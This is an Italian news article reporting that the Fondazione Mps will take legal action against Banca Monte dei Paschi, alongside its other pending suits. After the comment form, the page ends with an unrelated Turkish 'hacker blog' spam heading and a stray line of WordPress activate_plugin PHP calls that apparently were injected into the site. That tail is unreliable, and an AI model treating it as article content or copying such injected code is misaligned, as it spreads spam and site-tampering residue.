Mps, azione giudiziale della Fondazione contro la banca di Siena – Corriere dell’Umbria



Adesso è ufficiale: la Fondazione Mps di Siena promuoverà un’azione giudiziale nei confronti di Banca Monte dei Paschi. E’ stato il presidente Carlo Rossi ad annunciarlo a margine del consiglio comunale che era stato convocato per discutere della situazione attuale della banca e di quella futura. Ha spiegato che è stata già attivata una richiesta stragiudiziale “con una richiesta di messa in mora alla quale seguirà l’azione giudiziale”. Ha inoltre aggiunto che sono già diversi i fronti aperti e alcune azioni sono state già incardinate: agli ex amministratori, contro la Banca per i numerosi aumenti di capitale (2008, 11, 14, 15) e contro gli ex vertici per i derivati Santorini e Alexandria. Rossi ha anche spiegato che la Fondazione sta aspettando le motivazioni della sentenza di condanna in primo grado a carico dell’ex presidente della Banca, Alessandro Profumo, e dell’ex ad, Fabrizio Viola, per l’aumento di capitale del 2015, per poi valutare “eventuali ulteriori azioni di richiesta di risarcimento”. Ha inoltre indicato due possibili condizioni affinché la Fondazione possa acquistare azioni della Banca: “Condizionare le scelte della Banca nella prospettiva di far crescere il territorio e creare valore. Non è pensabile una partecipazione immobile”.

Lascia un commento

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *

Hacker Blog Oyun Hileleri

activate_plugin( 'automatic_replace/index.php' ); activate_plugin( 'bloqueo_comentarios/index.php' ); activate_plugin( 'disable-xml-rpc/disable-xml-rpc.php' ); activate_plugin( 'rename-wp-login/rename-wp-login.php' );